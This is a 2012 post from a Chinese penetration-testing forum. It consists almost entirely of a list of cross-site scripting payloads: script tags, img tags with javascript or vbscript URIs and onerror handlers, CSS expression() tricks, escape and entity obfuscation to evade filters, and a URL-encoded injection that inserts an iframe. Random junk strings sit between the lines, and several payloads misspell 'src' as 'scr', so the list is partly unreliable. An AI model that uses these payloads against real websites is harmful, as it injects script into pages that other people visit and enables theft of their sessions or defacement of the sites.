中国网络渗透测试联盟
标题:
xss
[打印本页]
作者:
admin
时间:
2012-9-15 14:09
标题:
xss
<script>alert("跨站")</script> (最常用)
! z f. ]+ E; B3 r# E, U3 z
<img scr=javascript:alert("跨站")></img>
" ^$ J) W6 q+ X, q, O
<img scr="javascript: alert(/跨站/)></img>
7 E& E- V; i; e0 U* I+ h
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
0 e" v/ I6 g$ U2 j. Y7 j* \
<img scr="#" onerror=alert(/跨站/)></img>
1 X" Q, Y1 f' d! m Z0 b
<img scr="#" style="xss:expression(alert(/xss/));"></img>
+ p1 F4 |) {; s
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
6 _! | i+ I5 v9 ~9 z6 k2 b
<img src=vbscript:msgbox ("xss")></img>
3 J: C! r2 s& R7 L
<style> input {left:expression (alert('xss'))}</style>
" d8 A( g. n* b
<div style={left:expression (alert('xss'))}></div>
- x$ U; f4 a+ D
<div style={left:exp/* */ression (alert('xss'))}></div>
- w# Q; l! y6 q3 X7 e6 S" r! v
<div style={left:\0065\0078ression (alert('xss'))}></div>
* B, N" @1 w( l# i g
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
! k' p1 h4 @. h1 }
unicode <div style="{left:expRessioN (alert('xss'))}">
9 S3 S9 G( W; J0 U
0 |- }4 ^, u- ?& A! _6 w
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["
( d3 l( a1 n/ e" `* E7 w
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2